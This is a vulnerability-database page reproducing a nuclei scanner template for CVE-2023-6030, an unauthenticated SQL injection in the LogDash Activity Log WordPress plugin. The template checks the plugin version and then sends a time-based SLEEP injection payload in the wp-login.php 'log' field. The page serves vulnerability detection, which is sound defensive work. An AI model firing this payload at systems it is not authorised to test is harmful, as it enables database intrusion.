Lucene search
K

LogDash Activity Log <= 1.1.3 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Critical SQL injection in LogDash Activity Log up to version 1.1.3 allows unauthenticated access; upgrade to 1.1.4.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6030
12 Mar 202621:02
circl
CNNVD
WordPress plugin LogDash Activity Log 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2023-6030
15 May 202520:09
cve
Cvelist
CVE-2023-6030 LogDash Activity Log < 1.1.4 - Unauthenticated SQLi
15 May 202520:09
cvelist
EUVD
EUVD-2023-58288
3 Oct 202520:07
euvd
NVD
CVE-2023-6030
15 May 202520:15
nvd
OSV
CVE-2023-6030
15 May 202520:15
osv
Patchstack
WordPress LogDash Activity Log plugin < 1.1.4 - Unauthenticated SQLi vulnerability
16 May 202522:38
patchstack
Positive Technologies
PT-2025-21372
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2023-6030
17 May 202521:04
redhatcve
Rows per page
id: CVE-2023-6030

info:
  name: LogDash Activity Log <= 1.1.3 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The LogDash Activity Log plugin for WordPress is vulnerable to SQL Injection via the username parameter in all versions up to, and including, 1.1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to execute arbitrary SQL commands, potentially compromising the database.
  remediation: |
    Upgrade to version 1.1.4 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/logdash-activity-log/logdash-activity-log-113-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6030
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6030
    epss-score: 0.00748
    epss-percentile: 0.50388
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,logdash-activity-log

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/logdash-activity-log/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.1.3")'
          - 'contains(body, "LogDash Activity Log")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - 'Stable tag:\s*([0-9]+\.[0-9]+\.[0-9]+)'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=' OR (SELECT 1 FROM (SELECT(SLEEP(7)))YY) # a&pwd=test&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 490a004630440220223013a46d9bba8bdb1e7793e31e8cf901f50969bf6ddbab1c7b5740d4e4ca05022028350efc6223e033760a67895f87168dbbe1e3abb90b9b47ece1523f93878a1f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Feb 2026 19:35Current
6Medium risk
Vulners AI Score6
CVSS 3.15.4
EPSS0.00748
SSVC
7